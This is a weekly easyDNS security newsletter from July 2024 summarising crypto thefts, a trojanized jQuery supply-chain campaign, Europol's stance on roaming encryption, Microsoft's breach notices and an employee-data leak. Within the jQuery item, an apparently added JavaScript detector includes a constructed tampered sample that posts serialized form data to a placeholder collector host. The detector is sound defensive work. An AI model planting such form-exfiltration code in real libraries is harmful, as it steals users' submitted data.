#AxisOfEasy 358: Crypto Thefts Soar To $1.4 Billion In 2024


Weekly Axis Of Easy #358


Last Week’s Quote was: “Governments tend not to solve problems, only to rearrange them,” by Ronald Reagan. Well done Ean, you’re our winner!

This Week’s Quote: 
“Nothing can stop the man with right mental attitude from achieving his goal; nothing on earth can help the man with the wrong mental attitude.” By ???

THE RULES: No searching up the answer, must be posted at the bottom of the blog post, in the comments section.

The Prize: First person to post the correct answer gets their next domain or hosting renewal on us.


This is your easyDNS #AxisOfEasy Briefing for the week of July 8th, 2024. Our Technology Correspondent Joann L Barnes and easyCEO Mark E. Jeftovic send out a short briefing on the state of the ‘net and how it affects your business, security and privacy.

To Listen/watch this podcast edition with commentary and insight from Joey Tweets, and Len the Lengend click here.


In this issue: 

  • Crypto Thefts Soar to $1.4 Billion in 2024
  • Trojanized jQuery Attack Targets Web Developers
  • Europol Pushes to Break Mobile Roaming Encryption
  • Microsoft Phishing Frenzy? Experts Slam Notification Emails After Russia Hack
  • Third-Party Breach Exposes Nokia and Microsoft Employee Data

Elsewhere Online:

  • Fujitsu Data Breach Caused by Worm, Not Ransomware
  • Scammed Twice? Fake Recovery Services Target Victims
  • APT40 Group Linked to Chinese Government Hacks
  • Avast Cracks DoNex Ransomware Family, Offers Free Decryption
  • Feds Bust AI-Powered Russian Disinformation Network

 

Crypto Thefts Soar to $1.4 Billion in 2024

Crypto thefts have doubled in 2024. From January 1 to June 24, hackers stole $1.4 billion from crypto exchanges, double the amount stolen in the same period of 2023, according to TRM Labs.

The record-breaking thefts of 2022, which reached $2 billion by June, remain the highest. In 2024, five major hacks accounted for 70% of the stolen amount. TRM Labs suggests the rise in average token prices could be a reason for the surge.

Private key and seed phrase compromises, smart contract exploits, and flash loan attacks are the main methods used by hackers. The biggest heist occurred in May, targeting DMM Bitcoin, a Japanese exchange, resulting in the theft of over 4,500 BTC, worth more than $300 million at the time.

“Stolen private keys or address poisoning could be the cause,” said TRM Labs researchers. Address poisoning involves sending small amounts of cryptocurrency to create fake transaction histories.

To combat these thefts, TRM Labs recommends regular security audits, robust encryption, multi-signature wallets, secure coding practices, and bounties for returning stolen funds. They emphasize the importance of staying updated on threats, educating employees, and fostering a security-aware culture.

Read: https://www.infosecurity-magazine.com/news/crypto-thefts-double-2024-trm-labs/?&web_view=true


Trojanized jQuery Attack Targets Web Developers

Since May 26, 2024, Phylum has been tracking a supply chain attack involving a tampered version of jQuery. This malicious variant was found on npm, GitHub, and as a CDN-hosted resource on jsDelivr.

The attack is notable for its variability. Dozens of packages contained the trojanized jQuery under different file names, such as jquery.min.js and icon.min.js. Each package had unique exfiltration URLs and included personal files not typically seen in npm publications.

The malicious jQuery alters the end function to send form data to remote URLs. “This attack is unlike most we’ve seen at this scale,” said Phylum researchers.

The trojanized jQuery was found in several packages on GitHub. The attackers even used jsDelivr to make their source look legitimate.

Developers using the compromised jQuery unknowingly send form data to attackers whenever the end or fadeTo function is called. This attack could impact many unsuspecting users who download and use these packages.

The sheer number of packages and the effort to hide the malware suggest a well-coordinated effort. Despite the specific conditions required to trigger the malware, the broad distribution means a wide potential impact, affecting many developers globally.

Read: https://blog.phylum.io/persistent-npm-campaign-shipping-trojanized-jquery/?&web_view=true
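
For teams that vendor jQuery, the tampering described above (code added to the end function that sends form data to a remote URL) can be checked for in a local copy. The following is an added example, not code from Phylum or from this newsletter; the function names, the indicator list and both sample snippets are constructed for illustration, and the brace matching is a heuristic that ignores braces inside string literals.

```javascript
// Added example: flag network or form-harvesting code inside the bodies of
// jQuery's end() and fadeTo() methods. Heuristic, not a parser.
const SUSPICIOUS = [
  /\$\.ajax|\bjQuery\.ajax|\bfetch\s*\(|XMLHttpRequest|sendBeacon/, // outbound request
  /\.serialize(Array)?\s*\(/,                                       // form harvesting
  /https?:\/\//,                                                    // hard-coded URL
];

// Return the brace-balanced body of `name: function (...) { ... }`, or null.
function methodBody(src, name) {
  const re = new RegExp("\\b" + name + "\\s*:\\s*function\\s*\\([^)]*\\)\\s*\\{");
  const m = re.exec(src);
  if (!m) return null;
  const start = m.index + m[0].length;
  let depth = 1, i = start;
  for (; i < src.length && depth > 0; i++) {
    if (src[i] === "{") depth++;
    else if (src[i] === "}") depth--;
  }
  return depth === 0 ? src.slice(start, i - 1) : null;
}

// Scan the named methods and return one finding per matched indicator.
function auditJquery(src, methods = ["end", "fadeTo"]) {
  const findings = [];
  for (const name of methods) {
    const body = methodBody(src, name);
    if (body === null) continue;
    for (const re of SUSPICIOUS) {
      const hit = re.exec(body);
      if (hit) findings.push({ method: name, indicator: hit[0] });
    }
  }
  return findings;
}

// Constructed samples: the two methods as they appear in upstream jQuery,
// and a copy whose end() also posts serialized form data to a placeholder host.
const FADE_TO = 'fadeTo: function (speed, to, easing, callback) { return this' +
  '.filter(isHiddenWithinTree).css("opacity", 0).show().end()' +
  '.animate({ opacity: to }, speed, easing, callback); }';
const CLEAN_SAMPLE =
  "end: function () { return this.prevObject || this.constructor(); }, " + FADE_TO;
const TAMPERED_SAMPLE =
  'end: function () { $.ajax({ url: "https://collector.example.invalid/c", ' +
  'data: $("form").serialize() }); return this.prevObject || this.constructor(); }, ' +
  FADE_TO;

console.log(auditJquery(CLEAN_SAMPLE).length, auditJquery(TAMPERED_SAMPLE));
```

A clean result from this check does not replace pinning the file to a known-good hash from the official jQuery release; it only catches the specific pattern reported here.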



Europol Pushes to Break Mobile Roaming Encryption

Europol, the EU’s law enforcement agency, aims to break mobile roaming encryption. This encryption, known as home routing, protects data by encrypting it through the home network while users roam.

Europol claims encryption hinders law enforcement investigations. They argue that removing encryption would help catch criminals more effectively. Europol’s paper describes home routing as a “serious challenge for lawful interception.”

The agency insists they need access to this encrypted traffic. “Europol swears it needs access to this protected traffic simply to catch criminals,” the paper states.

However, removing encryption raises privacy concerns. Breaking encryption could lead to mass surveillance and misuse by government agencies.

Europol suggests two solutions. One, disable privacy-enhancing technologies (PET) in home routing. Two, create a cross-border mechanism within the EU for quick interception requests by service providers.

Despite Europol’s arguments, there are existing methods to pursue criminals, like voluntary cooperation with providers outside the EU and issuing European Investigation Orders (EIOs). These methods are slower but maintain user privacy.

Tampering with encryption could compromise security and privacy, opening the door to potential abuse. Law-abiding citizens worry about the slippery slope from lawful surveillance to mass surveillance.

Read: https://reclaimthenet.org/europol-seeks-to-break-mobile-roaming-encryption


Microsoft Phishing Frenzy? Experts Slam Notification Emails After Russia Hack

In a move raising eyebrows among security experts, Microsoft is facing criticism over its handling of a March cyber attack by suspected Russian government hackers, Midnight Blizzard. The attack breached Microsoft’s systems and targeted customer data.

Microsoft’s customer notification process is under particular scrutiny. The company is emailing affected customers, but these emails bypass the usual secure portal and contain a suspicious link to a non-Microsoft domain, purviewcustomer.powerappsportals.com. Security researchers like Kevin Beaumont and cybersecurity consultants are slamming this approach, noting it mimics phishing tactics and has predictably sowed confusion. Customers are unsure if the emails are legitimate, and the link further fuels these concerns. This confusion is amplified by Microsoft’s silence on the number of impacted organizations and its refusal to comment on potential changes to its notification process.

The fallout extends beyond commercial customers. U.S. cybersecurity agency CISA previously confirmed these same hackers stole emails from federal agencies, highlighting the broader impact of the breach. With both customer data and government emails compromised, Microsoft’s response is raising questions about transparency and prioritizing security best practices.

Read: https://techcrunch.com/2024/07/10/microsoft-emails-that-warned-customers-of-russian-hacks-criticized-for-looking-like-spam-and-phishing/


Third-Party Breach Exposes Nokia and Microsoft Employee Data

Hacker “888” is making waves on Breach Forums, a notorious cybercrime platform. They claim to have leaked the personal and contact details of thousands of employees from both Nokia and Microsoft. There’s a twist: according to “888,” these leaks don’t stem from breaches of the tech giants’ own systems, but rather from a data security failure at a third-party contractor they both work with.

Nokia seems to have been impacted more severely, with data for 7,258 employees in the US and Finland exposed. This includes names, job titles, contact details, and email addresses. The timeframe for this data is murky, ranging from June 2022 to February 2023, and it’s unclear if current or former employees are affected. Microsoft dodged a slightly smaller bullet on July 9th, 2024, when data for 2,047 employees was leaked. Similar details to Nokia’s were exposed, but with the unsettling addition of links to their LinkedIn profiles.

While the lack of passwords and financial information might seem comforting, security experts are on edge. This leaked data is a prime target for malicious actors looking to launch phishing attacks or steal identities. The presence of LinkedIn profiles for Microsoft employees is particularly concerning, as it grants attackers valuable details for social engineering tactics. With both companies and their employees potentially facing a wave of cyberattacks, this leak exposes a critical vulnerability: the data security practices of third-party contractors in the tech industry.

Read: https://hackread.com/hacker-leaks-microsoft-nokia-employee-details/

 


Elsewhere Online:

 
Fujitsu Data Breach Caused by Worm, Not Ransomware
Read: https://www.darkreading.com/endpoint-security/fujitsu-suffers-worm-attack-not-ransomware


Scammed Twice? Fake Recovery Services Target Victims

Read: https://www.theregister.com/2024/07/09/australia_rescam_warning


APT40 Group Linked to Chinese Government Hacks

Read: https://hackread.com/five-eyes-blames-chinese-apt40-for-govt-hacks/


Avast Cracks DoNex Ransomware Family, Offers Free Decryption

Read: https://www.helpnetsecurity.com/2024/07/08/decryptor-donex-muse-darkrace-fake-lockbit-3-0/


Feds Bust AI-Powered Russian Disinformation Network

Read: https://www.darkreading.com/cloud-security/feds-uncover-genai-enabled-russian-troll-farm

 

If you missed the previous issues, they can be read online here:

 
